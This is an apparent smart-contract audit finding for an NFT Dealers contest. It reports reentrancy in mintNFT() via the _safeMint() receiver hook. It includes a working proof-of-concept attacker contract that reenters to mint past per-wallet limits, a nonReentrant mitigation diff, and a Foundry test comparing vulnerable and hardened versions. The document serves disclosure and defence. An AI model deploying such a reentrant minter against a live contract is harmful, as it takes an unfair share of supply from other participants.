NFT Dealers

First Flight #58
Beginner Friendly, Foundry
100 EXP
Submission Details
Impact: low
Likelihood: medium

Reentrancy in mintNFT() allows excessive single-transaction minting

Author: Revealed upon completion

Root + Impact

mintNFT() calls _safeMint(), which hands control to the recipient's onERC721Received() before mintNFT() has finished. A contract recipient can call mintNFT() again from inside that callback and mint several NFTs in one transaction, bypassing the per-user limit the function is meant to enforce and the fair distribution it relies on.

Description

  • Normally, mintNFT() lets a whitelisted user mint while the reveal state and the supply limit are respected, so that the collection is distributed fairly among all participants.

  • The function calls _safeMint() without reentrancy protection. _safeMint() first writes the new token's ownership and then, if the recipient is a contract, calls its onERC721Received() hook. Inside that hook the recipient can call mintNFT() again before the outer call has returned. Any per-wallet bookkeeping that mintNFT() performs after _safeMint() has not run yet at that point, so every reentrant call passes the same checks and one user ends up holding many NFTs from a single transaction. Note that a limit derived from balanceOf() would not be bypassed this way, because _mint() updates the balance before the callback; what reentry defeats is state written after the external call, and the root-cause snippet below shows no such update before the call.

// Root cause in the codebase
function mintNFT() external payable onlyWhenRevealed onlyWhitelisted {
@> _safeMint(msg.sender, tokenId); // triggers onERC721Received → reentrancy possible
}

Risk

Likelihood: Medium

  • Any whitelisted user can deploy a contract that implements onERC721Received() and reenters mintNFT() during a single mint transaction, provided the contract's address is the one on the whitelist: onlyWhitelisted is evaluated against msg.sender, which during the reentrant call is the attacker contract, not the account that deployed it.

Impact: Low

  • One user can mint a disproportionate share of the collection, up to the entire remaining supply, in a single transaction.

  • Other users are disadvantaged or completely blocked from minting, violating fair distribution rules.

Proof of Concept

// Attacker contract (PoC). `target` is the NFT Dealers contract and `limit` is how many
// NFTs to mint in one transaction. The attacker contract's address itself must be whitelisted.
interface INFTDealers { function mintNFT() external payable; }

contract ReentrantMinter {
    INFTDealers public immutable target;
    uint256 public immutable limit;
    uint256 public minted;

    constructor(INFTDealers _target, uint256 _limit) { target = _target; limit = _limit; }

    function attack() external { target.mintNFT(); }

    function onERC721Received(address, address, uint256, bytes calldata) external returns (bytes4) {
        minted++;
        if (minted < limit) {
            target.mintNFT(); // reenter mintNFT() before the outer call has finished
        }
        return this.onERC721Received.selector;
    }
}

Recommended Mitigation

Add reentrancy protection with OpenZeppelin's ReentrancyGuard (inherit it and mark mintNFT() nonReentrant). Independently of the guard, write any per-wallet mint state before calling _safeMint() (checks-effects-interactions), so the function stays safe even if the modifier is later removed:

- function mintNFT() external payable onlyWhenRevealed onlyWhitelisted {
+ function mintNFT() external payable onlyWhenRevealed onlyWhitelisted nonReentrant {
_safeMint(msg.sender, tokenId);
}
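Review bot: `nonReentrant` on the `+` line only compiles if the contract inherits ReentrancyGuard, and the hunk adds neither the import nor the base contract; add `import {ReentrancyGuard} from "@openzeppelin/contracts/utils/ReentrancyGuard.sol";` (the `security/` path in OpenZeppelin v4) and `ReentrancyGuard` to the contract's inheritance list. Independently of the guard, whatever per-wallet state the function records should be written before `_safeMint(msg.sender, tokenId);`, not after it, so the function also follows checks-effects-interactions.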
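The vulnerable pattern described above and the recommended fix side by side, as a Foundry test. This is an added example, not the NFT Dealers code base: VulnerableNFT, HardenedNFT, ReentrantMinter, addToWhitelist, hasMinted, nextTokenId and MAX_SUPPLY are hypothetical names standing in for the project's own whitelist, reveal and supply logic, and the import paths assume OpenZeppelin Contracts v5 and forge-std. The first test shows the per-wallet flag written after _safeMint() being bypassed by reentry; the second shows that writing it before the call and adding nonReentrant stops the attack (either alone is sufficient, together they are defence in depth). The supply cap, incremented before _safeMint() in both versions, is never exceeded: reentry only defeats state updated after the external call.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the NFT Dealers code. Assumes OpenZeppelin Contracts v5 and
// forge-std are installed; all contract and function names except mintNFT() are hypothetical.
import {Test} from "forge-std/Test.sol";
import {ERC721} from "@openzeppelin/contracts/token/ERC721/ERC721.sol";
import {IERC721Receiver} from "@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol";
import {ReentrancyGuard} from "@openzeppelin/contracts/utils/ReentrancyGuard.sol";

// Minimal model of the vulnerable pattern: the per-wallet flag is written only after
// _safeMint(), so the receiver callback still sees hasMinted[msg.sender] == false.
contract VulnerableNFT is ERC721 {
    uint256 public constant MAX_SUPPLY = 10;
    uint256 public nextTokenId;
    mapping(address => bool) public whitelisted;
    mapping(address => bool) public hasMinted;

    constructor() ERC721("Dealer", "DLR") {}

    // No access control: test-only stand-in for the project's whitelist management.
    function addToWhitelist(address account) external { whitelisted[account] = true; }

    function mintNFT() external payable virtual {
        require(whitelisted[msg.sender], "not whitelisted");
        require(!hasMinted[msg.sender], "already minted");
        require(nextTokenId < MAX_SUPPLY, "sold out");
        uint256 tokenId = nextTokenId++;     // supply cap is updated before the call, so it holds
        _safeMint(msg.sender, tokenId);      // external call into msg.sender happens here
        hasMinted[msg.sender] = true;        // effect after interaction: not yet set when reentered
    }
}

// Hardened variant: state is updated before the external call, and nonReentrant
// rejects the nested call outright.
contract HardenedNFT is VulnerableNFT, ReentrancyGuard {
    function mintNFT() external payable override nonReentrant {
        require(whitelisted[msg.sender], "not whitelisted");
        require(!hasMinted[msg.sender], "already minted");
        require(nextTokenId < MAX_SUPPLY, "sold out");
        hasMinted[msg.sender] = true;        // effect first
        uint256 tokenId = nextTokenId++;
        _safeMint(msg.sender, tokenId);      // interaction last
    }
}

// Attacker: reenters mintNFT() from the ERC-721 receiver hook until `wanted` tokens arrive.
contract ReentrantMinter is IERC721Receiver {
    VulnerableNFT public immutable target;
    uint256 public immutable wanted;
    uint256 public received;

    constructor(VulnerableNFT _target, uint256 _wanted) { target = _target; wanted = _wanted; }

    function attack() external { target.mintNFT(); }

    function onERC721Received(address, address, uint256, bytes calldata) external override returns (bytes4) {
        received++;
        if (received < wanted) target.mintNFT(); // outer mintNFT() is still on the call stack
        return IERC721Receiver.onERC721Received.selector;
    }
}

contract MintReentrancyTest is Test {
    function test_vulnerable_mintsManyInOneTransaction() public {
        VulnerableNFT nft = new VulnerableNFT();
        ReentrantMinter attacker = new ReentrantMinter(nft, 5);
        nft.addToWhitelist(address(attacker));   // the contract, not its deployer, must be whitelisted
        attacker.attack();
        assertEq(nft.balanceOf(address(attacker)), 5); // five tokens from one mintNFT() call
        assertTrue(nft.hasMinted(address(attacker)));
    }

    function test_hardened_revertsOnReentry() public {
        HardenedNFT nft = new HardenedNFT();
        ReentrantMinter attacker = new ReentrantMinter(nft, 5);
        nft.addToWhitelist(address(attacker));
        vm.expectRevert(); // nested call reverts and the revert bubbles up through _safeMint()
        attacker.attack();
        assertEq(nft.balanceOf(address(attacker)), 0);
    }
}
```

Run with forge test -vv. The hardened test uses a bare vm.expectRevert() because the inner nonReentrant revert is re-raised by OpenZeppelin's receiver check, which aborts the whole outer mintNFT() call rather than leaving a partial mint behind.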
